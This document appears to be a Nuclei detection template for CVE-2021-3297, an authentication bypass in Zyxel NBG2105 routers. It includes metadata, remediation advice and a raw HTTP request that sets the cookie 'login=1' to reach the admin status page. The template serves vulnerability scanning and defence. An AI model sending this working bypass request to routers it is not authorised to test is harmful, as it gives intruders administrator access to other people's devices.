id: CVE-2021-3297 info: name: Zyxel NBG2105 V1.00(AAGU.2)C0 - Authentication Bypass author: gy741 severity: high description: Zyxel NBG2105 V1.00(AAGU.2)C0 devices are susceptible to authentication bypass vulnerabilities because setting the login cookie to 1 provides administrator access. remediation: | Apply the latest firmware update provided by Zyxel to fix the authentication bypass vulnerability. reference: - https://github.com/nieldk/vulnerabilities/blob/main/zyxel%20nbg2105/Admin%20bypass - https://www.zyxel.com/us/en/support/security_advisories.shtml - https://www.zyxel.com/support/SupportLandingSR.shtml?c=gb&l=en&kbid=M-01490&md=NBG2105 - https://nvd.nist.gov/vuln/detail/CVE-2021-3297 classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2021-3297 cwe-id: CWE-287 epss-score: 0.18886 epss-percentile: 0.95678 cpe: cpe:2.3:o:zyxel:nbg2105_firmware:v1.00\(aagu.2\)c0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zyxel product: nbg2105_firmware tags: cve,cve2021,zyxel,auth-bypass,router http: - raw: - | GET /status.htm HTTP/1.1 Host: {{Hostname}} Cookie: language=en; login=1 matchers-condition: and matchers: - type: word words: - "Running Time" - "Firmware Version" - "Firmware Build Time" condition: and - type: status status: - 200 # digest: 4a0a0047304502204d6376f8643c8785212b673df47aef1d3dcc0c296a79eeec046bb99d4964d29f022100d2320559e055c7e01cace506d1fb74b1ad95bd12de0f87958bea4c4b87ca121a:922c64590222798bb761d5b6d8e72950